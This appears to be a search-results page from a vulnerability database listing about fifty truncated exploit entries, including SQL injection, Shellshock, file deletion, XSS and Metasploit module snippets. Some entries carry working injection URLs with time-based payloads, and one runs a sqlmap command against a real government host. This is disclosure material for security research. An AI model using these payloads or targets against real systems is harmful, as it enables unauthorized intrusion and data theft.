56796 matches found
Supesite: a front-end second-order injection
Brief description: Second-order injection. Details: In cp.php $ac = empty$GET'ac' ? 'profile' : trim$GET'ac'; ifinarray$ac, array'index', 'news', 'profile', 'credit', 'models' includeonceSROOT.'./source/cp'.$ac.'.php'; the file gets included. In source/cpnews.php $newsarr = array'subject' = $POST'subject', 'catid' = $POST'catid', 'type' =...
Doyo site builder SQL injection
Brief description: The table name is supplied by user input, with no filtering at all. Details: In source/pay.php function buymolds $this-id=$this-syArgs'id'; $this-molds=$this-syArgs'molds',1; if!$this-id&&!$this-moldsmessage"a"; $this-info=syDB$this-molds-findarray'id'=$this-id,'isshow'=1,null,'title,mgold,litpic'; if!$this-infomessage"指定购买内容不存在或未审核。";...
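Supesite: an injection (can promote yourself to administrator)
Brief description: Passwords dumped from Supesite via injection basically cannot be cracked. Being able to promote yourself to administrator directly, or to change the administrator's password yourself, would be ideal. Written in a spare moment. Details: In index.php if$SGET'action' != 'index' ifempty$channels'menus'$SGET'action''upnameid' && $channels'menus'$SGET'action''upnameid' != 'news' $scriptfile = SROOT.'./'.$SGET'action'.'.php'; else $scriptfile =...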
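easytalk: two blind SQL injections
Brief description: Two blind SQL injections in easytalk. Details: 1. At line 22 of Home\Lib\Action\SearchAction.class.php, $keyword=urldecodetrimhtmlspecialchars$REQUEST'keyword'; the keyword parameter is passed through urldecode. This bypasses the global gpc filtering and leads to injection. Because of character restrictions the injection is of limited use. http://127.0.0.1/easytalk/?m=search&type=user&keyword=%2527and%20mid%28VERSION%28%29,1,1%29=5%23 Data can be output...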
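Apple CMS: a SQL injection
Brief description: A SQL injection in Apple CMS. Details: Analysis reference: http://wooyun.org/bugs/wooyun-2014-066661 Exploitation reference: http://wooyun.org/bugs/wooyun-2014-074281 No code analysis is done here: Visit the URL: http://localhost/maccms8/index.php?m=art-search-wd-x%2527%2529%253E0%2520and%2520sleep%2528if%25281%252C5%252C1%2529%2529%2523 Here, after a default installation the macart table has no data, so we insert a row...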
Zoomla x2.0 /search/ShopList.aspx SQL injection vulnerability
No description provided by source...
TestLink 1.9.11 - Multiple SQL Injection Vulnerabilities
No description provided by source. Vulnerability title: Multiple SQL Injection Vulnerabilities in TestLink CVE: CVE-2014-5308 Vendor: Testlink Product: TestLink Affected version: 1.9.11 Fixed version: Fixed in SVN commit number 7a09973 Reported by: Jerzy Kramarz Details: Two SQL injection...
Rejetto HttpFileServer Remote Command Execution
No description provided by source. This module requires Metasploit: http://metasploit.com/download Current source: https://github.com/rapid7/metasploit-framework require 'msf/core' class Metasploit3 "Rejetto HttpFileServer Remote Command Execution", 'Description' = %q Rejetto HttpFileServer HFS i...
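Cmseasy: a stored XSS reaching the admin back end (bypasses XSS protection)
Brief description: A stored XSS in Cmseasy (bypasses XSS protection). It feels like the administrator is certain to be hit here. Details: Leave a message on the front end; of course, this message can also trigger the XSS on the front end. Go to the back end to view it. Proof of vulnerability:...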
Bacula-Web 5.2.10 (joblogs.php, jobid param) - SQL Injection
Google search: joblogs.php?jobid= Example: http://cep.treslagoas.ms.gov.br/backup/joblogs.php?jobid=23154 D:\sqlmappython sqlmap.py -u http://cep.treslagoas.ms.gov.br/backup/joblogs.php ?jobid=23154 --dbs | | 1.0-dev-nongit-20150806 | -| . | | | .'| . | || |||||,| | || || http://sqlmap.org ! legal disclaimer:...
Wordpress Slideshow Gallery 1.4.6 - Shell Upload (Python Exploit)
No description provided by source. !/usr/bin/env python WordPress Slideshow Gallery 1.4.6 Shell Upload Exploit WordPress Slideshow Gallery plugin version 1.4.6 suffers from a remote shell upload vulnerability CVE-2014-5460 Vulnerability discovered by: Jesus Ramirez Pichardo -...
DrayTek VigorACS SI 1.3.0 - Multiple Vulnerabilities
No description provided by source. DrayTek VigorACS SI = 1.3.0 Vigor ACS-SI Edition is a Central Management System for DrayTek routers and firewalls, providing System Integrators or system administration personnel a real-time integrated monitoring, configuration and management platform...
Kolibri Webserver 2.0 Buffer Overflow with EMET 5.0 and EMET 4.1 Partial Bypass
No description provided by source. !/bin/python import socket, sys, re Exploit Title: Kolibri POST Buffer overflow with EMET 5.0 and EMET 4.1 Partial Bypass Date: September 30th 2014 Author: tekwizz123 Vendor Homepage: http://www.senkas.com Software Download:...
Apache mod_cgi - Remote Exploit (Shellshock)
No description provided by source. ! /usr/bin/env python from socket import from threading import Thread import thread, time, httplib, urllib, sys stop = False proxyhost = "" proxyport = 0 def usage: print """ Shellshock apache modcgi remote exploit Usage: ./exploit.py var=value Vars: rhost: vict...
F5 iControl Remote Root Command Execution
No description provided by source. This module requires Metasploit: http//metasploit.com/download Current source: https://github.com/rapid7/metasploit-framework require 'msf/core' class Metasploit3 Msf::Exploit::Remote Rank = ExcellentRanking include Msf::Exploit::Remote::HttpClient def...
HP Network Node Manager I PMD Buffer Overflow
No description provided by source. This module requires Metasploit: http//metasploit.com/download Current source: https://github.com/rapid7/metasploit-framework require 'msf/core' class Metasploit3 Msf::Exploit::Remote Rank = NormalRanking include Msf::Exploit::Remote::Udp def initializeinfo =...
Wordpress InfusionSoft Plugin Upload Vulnerability
No description provided by source. This module requires Metasploit: http//metasploit.com/download Current source: https://github.com/rapid7/metasploit-framework require 'msf/core' class Metasploit3 Msf::Exploit::Remote Rank = ExcellentRanking include Msf::HTTP::Wordpress include...
LittleSite 0.1 /index.php arbitrary file download vulnerability
No description provided by source...
skywcm v3.1 /skywcm/webpage/download.jsp arbitrary file download vulnerability
No description provided by source...
Asx to Mp3 2.7.5 - Stack Overflow
No description provided by source...
GS Foto Uebertraeger 3.0 iOS - File Include Vulnerability
No description provided by source. Document Title: =============== GS Foto Uebertraeger v3.0 iOS - File Include Vulnerability References Source: ==================== http://www.vulnerability-lab.com/getcontent.php?id=1325 Release Date: ============= 2014-09-22 Vulnerability Laboratory ID VL-ID:...
Microsoft Exchange IIS HTTP Internal IP Address Disclosure
No description provided by source. Exploit Title: Microsoft Exchange IIS HTTP Internal IP Disclosure Vulnerability Google Dork: NA Date: 08/01/2014 Exploit Author: Nate Power Vendor Homepage: microsoft.com Software Link: NA Version: Exchange OWA 2003, Exchange CAS 2007/2010/2013 Tested on: Exchan...
Moab < 7.2.9 - Authorization Bypass
No description provided by source. Moab Authentication Bypass : CVE-2014-5300 Software: Moab Affected Versions: All versions prior to Moab 7.2.9 and Moab 8 CVE Reference: CVE-2014-5300 Author: John Fitzpatrick, MWR Labs http://labs.mwrinfosecurity.com/ Severity: High Risk Vendor: Adaptive Computi...
GNU bash 4.3.11 Environment Variable dhclient Exploit
No description provided by source. !/usr/bin/python Exploit Title: dhclient shellshocker Google Dork: n/a Date: 10/1/14 Exploit Author: @0x00string Vendor Homepage: gnu.org Software Link: http://ftp.gnu.org/gnu/bash/bash-4.3.tar.gz Version: 4.3.11 Tested on: Ubuntu 14.04.1 CVE :...
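phpok: injection combined with CSRF
Brief description: Parameter not filtered. Details: In projectcontrol.php function sortf $sort = $GET"sort"; if!$sort || !isarray$sort jsonexit"更新排序失败"; foreach$sort AS $key=$value $this-model'project'-updatetaxis$key,$value; jsonexit"更新排序成功",true; As you can see, the system does not go through its own get function but receives the variable directly with $GET, so injection arises...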
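SQL injection in an e-government system, part two, affecting many agencies
Brief description: SQL injection in an e-government system, part two, affecting many agencies. Details: Injection point: http://xxx/email/setting/other?boxid=1 Testing on the official site: so as not to affect the official site, I downloaded the latest version and tested the severity of the vulnerability locally. In the personal mail menu: add another folder as shown in the figure below. Test the boxid parameter with a single quote added: And there is the vulnerability: ...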
Apple CMS: a SQL injection
Brief description: A SQL injection in Apple CMS. Details: Analysis reference: http://wooyun.org/bugs/wooyun-2014-066661 Exploitation reference: http://wooyun.org/bugs/wooyun-2014-074281 No code analysis is done here: Visit the URL: http://localhost/maccms8/index.php?m=vod-search-pg-1-wd-xxxx%2527%2529%253E0%2520or%2520sleep%2528if%25281%252C5%252C1%2529%2529%2529%2523-typeid-5.html...
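YXCMS latest version: patch bypass, arbitrary file deletion continues
Brief description: YXCMS latest version: patch bypass, arbitrary file deletion continues. Details: A vulnerability first posted by the expert Matt on 2013-12-30: WooYun: yxcms arbitrary file deletion leading to a reinstallation vulnerability. The vendor released an upgrade package on 2014-01-13 that fixed this vulnerability, but the handling is not strict and can be bypassed, so arbitrary file deletion remains possible. See the code in protected/apps/members/contoller/newscontroller.php if empty$FILES'picture''name' === false $tfile=date"Ymd"; $imgupload=...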
PHPCompta/NOALYSS 6.7.1 5638 - Remote Command Execution
No description provided by source. Vulnerability title: Remote Command Execution in PHPCompta/NOALYSS CVE: CVE-2014-6389 Vendor: PHPCompta Product: PHPCompta/NOALYSS Affected version: 6.7.1 5638 Fixed version: 6.7.2 Reported by: Jerzy Kramarz Details: PhpCompta 6.7.1-2 does not validate the synta...
Epicor Enterprise 7.4 - Multiple Vulnerabilities
No description provided by source. "Epicor Enterprise vulnerabilities" - Affected vendor: Epicor Software Corporation - Affected system: Epicor Enterprise - Version 7.4 - Vendor disclosure date: May 13th, 2014 - Public disclosure date: September 30th, 2014 - Status: Fixed - Associated CVEs: 1...
HTTP File Server 2.3a, 2.3b, 2.3c - Remote Command Execution
No description provided by source...
RBS Change Complet Open Source 3.6.8 - CSRF Vulnerability
No description provided by source. Exploit Title: RBS Change Complet Open Source CSRF Google Dork: intext:"une réalisation rbs" Date: 10/01/2014 Exploit Author: KrustyHack Vendor Homepage: http://www.rbschange.fr/ Software Link:...
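CuuMall free open-source shopping mall system: email spoofing risk, usernames and passwords can be hijacked
Brief description: CuuMall free open-source shopping mall system: header spoofing risk, usernames and passwords can be hijacked. Details: Go straight to the code: loginAction.class.php:161-192: public function getpassword $username = $POST'username'; $mail = $POST'email'; $us = new Model "mmember" ; $dus = $us-where "username='".$username."'" -find ; if empty $dus $this-assign "waitSecond", 3 ;...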
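SQL injection in an e-government system, part three
Brief description: SQL injection in an e-government system, part three. Details: Injection point discovery: added a single quote. Now verifying the vulnerability: latest version downloaded locally GET /email/sent/readstatus/type/trash?id=1' HTTP/1.1 Host: localhost Proxy-Connection: keep-alive Cache-Control: max-age=0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,/;q=0.8 User-Agent: Mozilla/5.0 Windows NT 6.1; WOW64...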
TeamSpeak Client 3.0.14 - Buffer Overflow Vulnerability
No description provided by source. Title : TeamSpeak Client v3.0.14 - Buffer Overflow Vulnerability Severity : High+/Critical Reporters : SpyEye & Christian Galeone Software Version : 3.0.14 & Previous Versions Software Name : TeamSpeak Client Software Download Link :...
BMC Track-It! - Multiple Vulnerabilities
No description provided by source. Multiple critical vulnerabilities in BMC Track-It! Discovered by Pedro Ribeiro [email protected], Agile Information Security ================================================================================= The application exposes several .NET remoting services o...
All In One Wordpress Firewall 3.8.3 - Persistent XSS Vulnerability
No description provided by source. Document Title: =============== All In One Wordpress Firewall 3.8.3 - Persistent Vulnerability References Source: ==================== http://www.vulnerability-lab.com/getcontent.php?id=1325 Release Date: ============= 2014-09-29 Vulnerability Laboratory ID VL-I...
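Fanwe group-buying latest version: universal injection (with many cases attached)
Brief description: RT $$$$$$$$$$$$$$$$$$$$$$$ Details: It did not succeed on the official site, but it works almost universally. The problem is in this login interface: m.php?m=User&a=doLogin post:origURL=ghost&password=ghost&email=ghost (the email parameter is not filtered). Error-based injection http://www.qianrengou.com/m.php?m=User&a=doLogin post:post:origURL=ghost&password=ghost&email=ghost Default admin back end: admin.php...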
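SQL injection in an e-government system, affecting many agencies
Brief description: SQL injection in an e-government system, affecting many agencies. It was actually ignored by 360, yet it is a big hole after all... WooYun is still better... Typical cases listed on the official site: Guangdong Province Foshan Prison; Party School of the State Administration of Taxation; Unit 433809; Beijing Municipal Commission of Economy and Information Technology; Beijing People's Association for Friendship with Foreign Countries; Hong Kong and Macao Affairs Office of the Beijing Municipal People's Government; Beijing Foreign Affairs Comprehensive Service Hall; Dongguan No. 2 People's Court; Dongguan No. 1 People's Court; Daxing District Government; Information Center of the Wuzhou State Taxation Bureau, Guangxi; State Cryptography Administration; Henan Provincial Population and Family Planning Commission; State Council R&D Center; People's Government of Wujin District, Jiangsu Province; People's Daily; Housing and Construction Bureau of Longgang District, Shenzhen; Shenzhen Environmental Engineering Science and Technology Center Co., Ltd.; Education, Sports and Culture Bureau of Kecheng District, Quzhou, Zhejiang Province; Xingtai Municipal Commission for Discipline Inspection. Details:...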
Linux Kernel remount FUSE Exploit
No description provided by source. / FUSE-based exploit for CVE-2014-5207 Copyright c 2014 Andy Lutomirski Based on code that is: Copyright C 2001-2007 Miklos Szeredi [email protected] This program can be distributed under the terms of the GNU GPL. See the file COPYING. gcc -Wall fusesuid.c...
Internet Explorer 8 - Fixed Col Span ID Full ASLR, DEP & EMET 5.0 Bypass (MS12-037)
No description provided by source. !-- Internet Explorer 8 Fixed Col Span ID full ASLR, DEP and EMET 5.0 bypass Exploit Coded by sickness || EMET 5.0 bypass by ryujin http://www.offensive-security.com/vulndev/disarming-emet-v5-0/ Affected Software: Internet Explorer 8 Vulnerability: Fixed Col...
YXcms latest version arbitrary file deletion vulnerability
Brief description: The latest version of YXcms allows deletion of arbitrary files. Details: Affected file: \YXcms1.2.4\protected\apps\member\controller\inforController.php public function index if!$this-isPost $auth=$this-auth; $id=$auth'id'; $info=model'members'-find"id='$id'"; $this-info=$info; $this-path=ROOT.'https://images.seebug.org/upload/member/image/';...
ManageEngine OpManager / Social IT Arbitrary File Upload
No description provided by source. This module requires Metasploit: http//metasploit.com/download Current source: https://github.com/rapid7/metasploit-framework require 'msf/core' class Metasploit3 Msf::Exploit::Remote Rank = ExcellentRanking include Msf::Exploit::Remote::HttpClient include...
OpenFiler 2.99.1 - CSRF Vulnerability
No description provided by source. !-- Exploit Title: DoS via CSRF in openfiler Exploit author: Dolev Farhi @dolevff Date 07/05/2014 Vendor homepage: http://www.openfiler.com Affected Software version: 2.99.1 Alerted vendor: 7.5.14 CVE: N/A Software Description ===================== Openfiler is ...
Ultra Electronics 7.2.0.19 and 7.4.0.7 - Multiple Vulnerabilities
No description provided by source. Ultra Electronics / AEP Networks - SSL VPN Netilla / Series A / Ultra Protect Vulnerabilities http://www.osisecurity.com.au/advisories/ultra-aep-netilla-vulnerabilities Release Date: 02-Oct-2014 Software: Ultra Electronics - Series A...
Postfix SMTP - Shellshock Exploit
No description provided by source. !/bin/python Exploit Title: Shellshock SMTP Exploit Date: 10/3/2014 Exploit Author: fattymcwopr Vendor Homepage: gnu.org Software Link: http://ftp.gnu.org/gnu/bash/ Version: 4.2.x 4.2.48 Tested on: Debian 7 postfix smtp server w/procmail CVE : 2014-6271 from...
FRHRCMS V3.0 /person/person_certificate.php arbitrary file deletion vulnerability
No description provided by source...
Bash - CGI RCE (MSF) Shellshock Exploit
No description provided by source. This module requires Metasploit: http//metasploit.com/download Current source: https://github.com/rapid7/metasploit-framework require 'msf/core' class Metasploit3 Msf::Exploit::Remote Rank = ExcellentRanking include Msf::Exploit::Remote::HttpClient include...
IPFire Cgi Web Interface Authenticated Bash Environment Variable Code Injection exploit
No description provided by source. !/usr/bin/env python Exploit Title : IPFire = 2.15 core 82 Authenticated cgi Remote Command Injection ShellShock Exploit Author : Claudio Viviani Vendor Homepage : http://www.ipfire.org Software Link:...
Pure-FTPd External Authentication Bash Environment Variable Code Injection
No description provided by source. This module requires Metasploit: http//metasploit.com/download Current source: https://github.com/rapid7/metasploit-framework require 'msf/core' class Metasploit4 Msf::Exploit::Remote Rank = ExcellentRanking include Msf::Exploit::Remote::Ftp include...